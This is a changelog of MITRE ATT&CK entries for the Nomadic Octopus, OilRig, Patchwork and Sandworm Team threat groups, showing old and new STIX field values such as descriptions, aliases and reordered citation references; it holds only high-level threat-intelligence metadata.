| [Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyberespionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) | [Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 15:22:52.708000+00:00 | 2022-09-02 18:03:55.294000+00:00 |
| description | [Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyberespionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) | [Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) |
| external_references[1]['source_name'] | Nomadic Octopus | DustSquad |
| external_references[1]['description'] | (Citation: SecurityWeek Nomadic Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) | (Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: SecurityWeek Nomadic Octopus Oct 2018) |
| external_references[2]['source_name'] | DustSquad | Nomadic Octopus |
| external_references[2]['description'] | (Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: SecurityWeek Nomadic Octopus Oct 2018) | (Citation: SecurityWeek Nomadic Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) |
| external_references[3]['source_name'] | Security Affairs DustSquad Oct 2018 | ESET Nomadic Octopus 2018 |
| external_references[3]['description'] | Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021. | Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. |
| external_references[3]['url'] | https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html | https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf |
| external_references[5]['source_name'] | ESET Nomadic Octopus 2018 | SecurityWeek Nomadic Octopus Oct 2018 |
| external_references[5]['description'] | Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. | Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021. |
| external_references[5]['url'] | https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf | https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia |
| external_references[6]['source_name'] | SecurityWeek Nomadic Octopus Oct 2018 | Security Affairs DustSquad Oct 2018 |
| external_references[6]['description'] | Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021. | Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021. |
| external_references[6]['url'] | https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia | https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html |

| Old Description | New Description |
|---|---|
| [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) | [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/ | |

| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/ | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 22:04:08.941000+00:00 | 2022-06-02 20:18:52.733000+00:00 |
| description | [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) | [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) |
| aliases[3] | HELIX KITTEN | APT34 |
| aliases[4] | APT34 | Helix Kitten |
| external_references[1]['source_name'] | OilRig | IRN2 |
| external_references[1]['description'] | (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018) | (Citation: Crowdstrike Helix Kitten Nov 2018) |
| external_references[2]['source_name'] | COBALT GYPSY | OilRig |
| external_references[2]['description'] | (Citation: Secureworks COBALT GYPSY Threat Profile) | (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018) |
| external_references[3]['source_name'] | IRN2 | COBALT GYPSY |
| external_references[3]['description'] | (Citation: Crowdstrike Helix Kitten Nov 2018) | (Citation: Secureworks COBALT GYPSY Threat Profile) |
| external_references[4]['source_name'] | HELIX KITTEN | Helix Kitten |
| external_references[5]['source_name'] | APT34 | Check Point APT34 April 2021 |
| external_references[5]['description'] | This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021) | Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021. |
| external_references[6]['source_name'] | Palo Alto OilRig April 2017 | ClearSky OilRig Jan 2017 |
| external_references[6]['description'] | Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017. | ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017. |
| external_references[6]['url'] | http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/ | http://www.clearskysec.com/oilrig/ |
| external_references[7]['source_name'] | ClearSky OilRig Jan 2017 | Palo Alto OilRig May 2016 |
| external_references[7]['description'] | ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017. | Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017. |
| external_references[7]['url'] | http://www.clearskysec.com/oilrig/ | http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/ |
| external_references[8]['source_name'] | Palo Alto OilRig May 2016 | Palo Alto OilRig April 2017 |
| external_references[8]['description'] | Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017. | Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017. |
| external_references[8]['url'] | http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/ | http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/ |
| external_references[10]['source_name'] | Unit 42 Playbook Dec 2017 | Unit 42 QUADAGENT July 2018 |
| external_references[10]['description'] | Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017. | Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018. |
| external_references[10]['url'] | https://pan-unit42.github.io/playbook_viewer/ | https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/ |
| external_references[11]['source_name'] | FireEye APT34 Dec 2017 | Crowdstrike Helix Kitten Nov 2018 |
| external_references[11]['description'] | Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017. | Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018. |
| external_references[11]['url'] | https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/ |
| external_references[12]['source_name'] | Unit 42 QUADAGENT July 2018 | FireEye APT34 Dec 2017 |
| external_references[12]['description'] | Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018. | Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017. |
| external_references[12]['url'] | https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/ | https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html |
| external_references[14]['source_name'] | Crowdstrike Helix Kitten Nov 2018 | APT34 |
| external_references[14]['description'] | Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018. | This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021) |
| external_references[15]['source_name'] | Check Point APT34 April 2021 | Unit 42 Playbook Dec 2017 |
| external_references[15]['description'] | Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021. | Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017. |
| external_references[15]['url'] | https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/ | https://pan-unit42.github.io/playbook_viewer/ |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Dragos Threat Intelligence | |

| Old Description | New Description |
|---|---|
| [Patchwork](https://attack.mitre.org/groups/G0040) is a cyberespionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018. (Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: TrendMicro Patchwork Dec 2017) (Citation: Volexity Patchwork June 2018) | [Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf | |
| external_references | http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf | |

| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf | |
| external_references | https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-02 21:07:07.755000+00:00 | 2022-09-02 18:04:32.246000+00:00 |
| description | [Patchwork](https://attack.mitre.org/groups/G0040) is a cyberespionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018. (Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: TrendMicro Patchwork Dec 2017) (Citation: Volexity Patchwork June 2018) | [Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018) |
| external_references[2]['source_name'] | Hangover Group | Chinastrats |
| external_references[2]['description'] | Patchwork and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon) | (Citation: Securelist Dropping Elephant) |
| external_references[4]['source_name'] | Chinastrats | Hangover Group |
| external_references[4]['description'] | (Citation: Securelist Dropping Elephant) | [Patchwork](https://attack.mitre.org/groups/G0040) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon) |
| external_references[5]['source_name'] | MONSOON | Cymmetria Patchwork |
| external_references[5]['description'] | MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018) | Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016. |
| external_references[6]['source_name'] | Operation Hangover | Operation Hangover May 2013 |
| external_references[6]['description'] | It is believed that the actors behind Patchwork are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013) | Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016. |
| external_references[7]['source_name'] | Cymmetria Patchwork | Symantec Patchwork |
| external_references[7]['description'] | Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016. | Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016. |
| external_references[7]['url'] | https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf | http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries |
| external_references[8]['source_name'] | Symantec Patchwork | Unit 42 BackConfig May 2020 |
| external_references[8]['description'] | Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016. | Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020. |
| external_references[8]['url'] | http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries | https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/ |
| external_references[9]['source_name'] | TrendMicro Patchwork Dec 2017 | Operation Hangover |
| external_references[9]['description'] | Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. | It is believed that the actors behind [Patchwork](https://attack.mitre.org/groups/G0040) are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013) |
| external_references[10]['source_name'] | Volexity Patchwork June 2018 | Securelist Dropping Elephant |
| external_references[10]['description'] | Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. | Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016. |
| external_references[10]['url'] | https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/ | https://securelist.com/the-dropping-elephant-actor/75328/ |
| external_references[11]['source_name'] | Securelist Dropping Elephant | PaloAlto Patchwork Mar 2018 |
| external_references[11]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016. | Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018. |
| external_references[11]['url'] | https://securelist.com/the-dropping-elephant-actor/75328/ | https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/ |
| external_references[12]['source_name'] | PaloAlto Patchwork Mar 2018 | TrendMicro Patchwork Dec 2017 |
| external_references[12]['description'] | Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018. | Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. |
| external_references[12]['url'] | https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/ | https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf |
| external_references[13]['source_name'] | Unit 42 BackConfig May 2020 | Volexity Patchwork June 2018 |
| external_references[13]['description'] | Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020. | Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. |
| external_references[13]['url'] | https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/ | https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/ |
| external_references[14]['source_name'] | Forcepoint Monsoon | MONSOON |
| external_references[14]['description'] | Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016. | MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018) |
| external_references[15]['source_name'] | Operation Hangover May 2013 | Forcepoint Monsoon |
| external_references[15]['description'] | Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016. | Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016. |
| external_references[15]['url'] | http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf | https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf |
| Description |
|---|
| [Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020) In October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Dragos Threat Intelligence'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack', 'mobile-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 21:46:19.437000+00:00 | 2022-10-12 20:11:40.313000+00:00 |
| aliases[6] | VOODOO BEAR | Voodoo Bear |
| external_references[1]['source_name'] | Sandworm Team | Voodoo Bear |
| external_references[1]['description'] | (Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) |
| external_references[3]['source_name'] | Telebots | Sandworm Team |
| external_references[3]['description'] | (Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) |
| external_references[4]['source_name'] | IRON VIKING | Quedagh |
| external_references[4]['description'] | (Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020) |
| external_references[6]['source_name'] | Quedagh | Telebots |
| external_references[6]['description'] | (Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) |
| external_references[7]['source_name'] | VOODOO BEAR | IRON VIKING |
| external_references[7]['description'] | (Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) |
| external_references[8]['source_name'] | US District Court Indictment GRU Unit 74455 October 2020 | US District Court Indictment GRU Oct 2018 |
| external_references[8]['description'] | Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020. | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020. |
| external_references[8]['url'] | https://www.justice.gov/opa/press-release/file/1328521/download | https://www.justice.gov/opa/page/file/1098481/download |
| external_references[9]['source_name'] | UK NCSC Olympic Attacks October 2020 | Dragos ELECTRUM |
| external_references[9]['description'] | UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020. | Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020. |
| external_references[9]['url'] | https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games | https://www.dragos.com/resource/electrum/ |
| external_references[10]['source_name'] | iSIGHT Sandworm 2014 | F-Secure BlackEnergy 2014 |
| external_references[10]['description'] | Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017. | F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. |
| external_references[10]['url'] | https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html | https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf |
| external_references[11]['source_name'] | CrowdStrike VOODOO BEAR | iSIGHT Sandworm 2014 |
| external_references[11]['description'] | Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018. | Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017. |
| external_references[11]['url'] | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/ | https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html |
| external_references[12]['source_name'] | USDOJ Sandworm Feb 2020 | CrowdStrike VOODOO BEAR |
